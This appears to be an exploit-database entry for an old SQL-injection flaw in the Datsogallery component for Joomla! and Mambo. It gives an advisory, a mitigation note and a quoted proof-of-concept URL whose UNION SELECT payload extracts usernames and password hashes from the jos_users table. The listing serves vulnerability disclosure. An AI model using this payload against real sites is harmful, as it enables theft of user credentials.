header-logo
Suggest Exploit
vendor:
Datsogallery
by:
SecurityFocus
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Datsogallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla! and Mambo
2008

SQL Injection in Datsogallery Component for Joomla! and Mambo

The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Ensure that user-supplied data is properly sanitized before being used in an SQL query.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28361/info

The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_datsogallery&func=detail&id='union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*

Navigation

Suggest Exploit

Services By CQR